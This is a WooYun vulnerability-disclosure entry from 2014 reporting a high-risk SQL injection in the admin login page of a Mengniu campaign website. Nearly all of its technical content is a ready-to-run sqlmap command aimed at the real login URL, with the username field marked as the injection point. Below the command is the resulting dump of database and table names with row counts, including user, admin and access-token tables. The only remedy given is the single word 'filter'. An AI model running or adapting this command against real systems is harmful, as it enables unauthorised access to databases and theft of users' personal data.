当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082174

漏洞标题:蒙牛集团高危SQL注射

相关厂商:mengniu.com.cn

漏洞作者: 黑暗游侠

提交时间:2014-11-06 10:36

修复时间:2014-12-21 10:40

公开时间:2014-12-21 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蒙牛集团高危SQL注射

详细说明:

蒙牛集团高危SQL注射

漏洞证明:

sqlmap -u "http://happiness.mengniu.com.cn/admin/app/login.php" --data="button=1&password=123&username=*" --dbs


Database: newyear2013
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `2012mengniu_gohome_hotline` | 293214 |
| `2012mengniu_gohome` | 89008 |
| `2012mengniu_nogohome_letter` | 57566 |
| `2012mengniu_jiaozi` | 19521 |
| `2014sdn_question` | 10701 |
| `2012mengniu_gohome_keyword` | 8092 |
| `2014sdn_answer` | 2254 |
| `2012mengniu_gohome_showhappy` | 1492 |
| `2012mengniu_city` | 572 |
| `2012mengniu_regdinner` | 54 |
| `2012mengniu_gohome_gettoprovince` | 34 |
| `2012mengniu_gohome_leavecity` | 34 |
| `2012mengniu_nogohome_gettocity` | 34 |
| `2012mengniu_peoplenum` | 5 |
| admin_user | 1 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| harvard_district | 3511 |
| harvard_area | 3131 |
| harvard_users | 651 |
| harvard_city | 345 |
| harvard_coin_history | 64 |
| harvard_province | 34 |
| harvard_winner | 23 |
| harvard_game_history | 19 |
| harvard_baby_audio | 13 |
| harvard_support_history | 12 |
| harvard_talk_history | 9 |
| harvard_baby_pic | 8 |
| harvard_baby_txt | 8 |
| harvard_baby_video | 7 |
| harvard_game | 4 |
| harvard_exchange_history | 3 |
| harvard_weeks | 3 |
| harvard_ex_history | 2 |
| harvard_access_token | 1 |
| harvard_share_history | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 432 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 64 |
| TABLES | 52 |
| CHARACTER_SETS | 36 |
| KEY_COLUMN_USAGE | 36 |
| TABLE_CONSTRAINTS | 36 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:4 (WooYun评价)